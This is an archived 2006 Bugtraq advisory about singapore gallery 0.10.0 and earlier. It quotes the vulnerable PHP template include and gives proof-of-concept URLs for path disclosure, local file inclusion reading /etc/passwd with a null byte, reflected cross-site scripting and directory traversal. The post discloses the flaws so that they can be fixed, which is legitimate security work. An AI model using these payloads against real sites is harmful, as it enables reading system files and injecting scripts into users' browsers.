| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060618083138.16437.qmail@securityfocus.com>
Date: 18 Jun 2006 08:31:38 -0000
From: simo64@...il.com
To: bugtraq@...urityfocus.com
Subject: singapore gallery <= 0.10.0 Multiple Vulnerabilities
Produce : singapore gallery
Versions : 0.10.0 and prior
Site : http://www.sgal.org/
Discovred By : Moroccan Security Research Team (Simo64)
Greetz : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid
.:r00tkita - s4mi - Silitix - tahati - And All Friends :)
[-] Vulnerable code near lignes 16-35
<?
16 . require_once "includes/singapore.class.php";
19 . $sg = new Singapore();
35 . include $sg->config->base_path.$sg->config->pathto_current_template."index.tpl.php";
?>
[+] Full Path Disclosure :
**************************
Exemple:
http://localhost/singapore/index.php?template=simo64
Result :
Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35
[+] Local File Inclusion :
***************************
Proof Of Concept :
http://localhost/singapore/index.php?template=./../../../../etc/passwd%00
[+] Cross Site Scripting :
**************************
http://localhost/singapore/index.php?template=<script>alert('Moroccan Security Team');</script>
[+] Directory Traversal :
**************************
Proof Of Concept :
http://localhost/singapore/index.php?gallery=./../../../
Powered by blists - more mailing lists